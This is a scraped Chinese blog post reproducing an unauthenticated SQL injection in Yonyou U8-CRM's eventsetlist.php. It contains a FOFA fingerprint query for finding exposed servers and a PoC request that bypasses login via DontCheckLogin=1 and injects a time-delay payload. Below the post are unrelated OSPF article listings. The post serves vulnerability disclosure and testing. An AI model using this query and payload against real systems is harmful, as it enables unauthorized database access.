用友U8-CRM系统接口eventseteventsetlist.php存在SQL注入

Sword-heart

于 2025-05-21 10:06:34 发布

阅读量503

点赞数 16

CC 4.0 BY-SA版权

分类专栏：漏洞复现文章标签： sql 安全 web安全漏洞复现漏洞利用漏洞库

本文链接：https://blog.youkuaiyun.com/jd_cx/article/details/148105145

漏洞复现专栏收录该内容

181 篇文章

订阅专栏

免责声明

本文章仅做网络安全技术研究使用！严禁用于非法犯罪行为，请严格遵守国家法律法规；请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。

问题描述

用友U8-CRM系统接口eventseteventsetlist.php存在SQL注入，未经身份验证的攻击者可执行任意SQL语句。

fofa

body="用友U8CRM" || body="/js/tfunction.js" || title="用友U8CRM"

poc

GET /eventset/eventsetlist.php?DontCheckLogin=1&action=stop&stopFlag=1&eventID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: 
Cookie: PHPSESSID=bgsesstimeout-;

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sword-heart

关注关注

16
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

OSPF的特殊区域及实验

骑猪兜风的博客

04-19

598

Stub Area末梢区域 Stub Area禁止来自Area0的Type-4、Type-5 LSA进入。 Stub Area的ABR会自动向该区域下发使用Type-3 LSA描述的默认路由。 Stub Area路由器禁止执行外部路由重发布动作。 Totally sutb area 完全末梢区域 Totally Stub Area禁止来自Area0的3、4、5类LSA进入。 Totally Stub Area的ABR会自动向该区域下发使用Type-3 LSA描述的的默认路由。 Totally Stu

OSPF特殊区域综合实验

weixin_71988966的博客

07-25

258

ospf综合实验

参与评论您还未登录，请先登录后发表或查看评论

ospf的特殊区域实验

m0_48580960的博客

04-19

323

AR7的代码 [Huawei]sys R7 [R7]int LoopBack 0 [R7-LoopBack0]ip a 192.168.1.1 24 [R7-LoopBack0]int LoopBack 1 [R7-LoopBack1]ip a 192.168.2.1 24 [R7-LoopBack1]int LoopBack 2 [R7-LoopBack2]ip a 192.168.3.1 24 [R7-LoopBack2]int LoopBack 3 [R7-LoopBack3]ip a 192.1..

OSPF特殊区域实验

m0_62452465的博客

08-04

638

引入成功，但是防止出现环路，我们还需要写一条黑洞路由（因为172.16.0.0网段包含了172.16.1.0网段在内可能出现环路，所以此处需要写一条缺省的黑洞路由）需要对172.16.0.0，172.16.2.0,172.16.3.0 进行引入，这几条路由都属于直连路由，需要写路由策略。1）R1至R6的路由器使用OSPF多区域完成路由发布，具体OSPF区域划分如图所示；1）在R3上输入display ospf lsdb，查看域外域内路由是否汇总；通过查看本地路由表确定需要引入的路由类型。

HCIE(OSPF特殊区域实验)

weixin_43801718的博客

02-15

655

OSPF特殊区域不能是骨干，不能配置虚链路切记：配置特殊区域时，该区域内所有设备均配置；因为建立邻居条件中要求特殊区域标记必须完全一致【1】不能存在ASBR 末梢区域该区域拒绝4/5的LSA；由该区域连接骨干的ABR向区域内发送一条3类的缺省路由华为设备拓扑图 . 在图中，R1互为RIP和OSPF的协议边界，当在R1上将RIP的路由导入OSPF中，那么RIP的路由在OSPF的R4路...

17_OSPF_LSA及特殊区域详解.pdf

09-27

* Stub Area：是一个特殊的 OSPF 区域，不能与外部网络进行路由交换。 * Not-So-Stubby Area（NSSA）：是一个特殊的 OSPF 区域，可以与外部网络进行路由交换，但不能与骨干区域进行路由交换。 * Backbone Area：是 ...

OSPF 特殊类型区域 Stub / Totally Stub / NSSA / Totally NSSA 区别 | 实验详解

最新发布

u013669912的博客

09-11

3255

……

HCIA/HCIP使用eNSP模拟OSPF特殊区域综合实验（Stub TotallyStub NSSA TotallyNSSA）

12-21

OSPF Comprehensive.topo

nssa和stub_OSPF里几个特殊区域（stub、Totally stubby、NSSA、Totally NSSA）总结

weixin_39897749的博客

12-21

1567

首先，不管什么stub，其区域内所有router都要设成对应stub，否则邻居down，因为配置为末节区域的路由器上所有接口发出的Hello包中都会有末节标签。对于所有的末节区域，ABR总是过滤掉5类LSA。绝对末节区域和绝对NSSA里ABR还将3类LSA过滤掉。普通末节区域和NSSA会正常通行3类LSA。区域间路由汇总必须在ABR上完成Area 1 range 1.1.4.0255.255.25...

OSPF NSSA区域

qq_70985855的博客

05-09

1299

OSPF 协议定义了Stub 区域和Totally Stub 区域这两种特殊的非骨干区域，为的是精简 LSDB 中 LSA 的数量，同时也精简路由表中的路由条目数量，实现优化设备和网络性能的目的。根据定义， Stub 区域或 Totally Stub 区域中是不允许存在 ASBR 路由器的。然而，在实际环境中，由于某种需要，有可能希望在 Stub 区域或 Totally Stub 区域引入外部路由。

配OSPF特殊区域实验

weixin_45142629的博客

06-23

427

一、拓扑图二、配置 R1: router ospf 1 router-id 1.1.1.1 auto-cost reference-bandwidth 1000 area 1 stub #将区域1配置为末节区域 network 172.16.1.1 0.0.0.0 area 1 network 172.16.12.1 0.0.0.0 area 1 R2： router ospf 1 router-id 2.2.2.2 auto-cost reference-bandwidth 1000 area 1

HCIP：OSPF特殊区域分析综合实验

m0_63775189的博客

06-14

597

公司网络拓扑如下：OSPF基础配置已经完成，作为网络管理员，有如下几个问题解决： 1、总公司与分公司A、B之间通讯正常，但无法与办事处C通讯 2、分公司A的设备性能较低，希望降低理由计算、储存压力，同时考虑网络引入外部路由功能 3、办事处C外来人员较多，采用比较安全的方式保证路由交互的安全性 4、RTA引入外部路由是除了考虑外部开销之外，还需要考虑OSPF域内的开销

OSPF特殊区域及其他特性实验—学习

padefe123的博客

08-09

676

在模拟器上，拉三台模拟设备路由器做OSPF的特殊区域Stub、Totally Stub、NSSA、 Totally NSSA四种区域的基础实验，进行学习与分析。

hcip06 ospf特殊区域综合实验

qq_45476645的博客

07-30

489

hcip06 ospf特殊区域综合实验

ospf特殊区域的2个小实验

godlovelong163的博客

02-19

350

实验1：配置： [RA]dis cu c ospf [V200R003C00] ospf 1 router-id 1.1.1.1 area 0.0.0.0 network 10.1.1.0 0.0.0.3 area 0.0.0.1 area 0.0.0.2 network 10.3.1.0 0.0.0.3 vlink-peer 3.3.3.3 [RB]dis cu c ospf [V200R0...

OSPF特殊区域Stub配置实验及简单对比

离人散

10-20

2597

一、实验目的 1、掌握OSPF动态路由协议的定义和功能； 2、掌握OSPF动态路由协议的特征和工作原理。 3、掌握路由器中OSPF特殊区域TOTAL STUB配置方法和功能验证； 4、掌握OSPF特殊区域TOTAL STUB配置的作用；二、实验内容 1、绘制拓扑图，根据拓扑图进行试验： 2、配置路由器，并最终验证网络的连通性。三、实验流程（一）配置任务说明实验拓扑：由图知：该实验分为...

OSPF综合实验

z_ar_d的博客

05-03

567

1.R4为ISP，其上只能配置IP地址，R4与其他所有直连设备间均使用公有IP2.R3.R5.R6.R7为MGRE环境，R3为中心站点3.整个OSPF环境基于172.16.0.0/16进行划分子网划分4.所有设备均可访问R4环回 NAT转换5.减少LSA更新量，加快收敛，保障更新安全做特殊区域6.全网可达。

OSPF综合实验作业

Wild22的博客

11-20

626

ospf综合实验

OSPF Stub区域和NSSA区域实验配置

weixin_50281314的博客

12-08

2122

1、验证了将一个区域配置为 Stub 区域以后，ABR 会阻断 Type-4 LSA、Type-5 LSA 向该区域发送，并通过 Type-3 LSA 向该区域内泛洪一条默认路由指向 ABR 自身。 2、验证了 NSSA 区域阻断了外部的 Type-4 LSA、Type-5 LSA 进入，并且ABR 会向区域内下发一条由 Type-7 LSA 描述的默认路由。ASBR 向NSSA 区域内下发 Type-7LSA 描述本区域中引入的外部路由。

OSPF NSSA区域详解：从概念到实验验证

"本文主要探讨了OSPF协议中的NSSA（Not-So-Stub-Area）区域和完全NSSA区域的概念、特点以及LSA（Link State Advertisements）的类型。" OSPF（Open Shortest Path First）是一种广泛应用的内部网关协议（IGP），...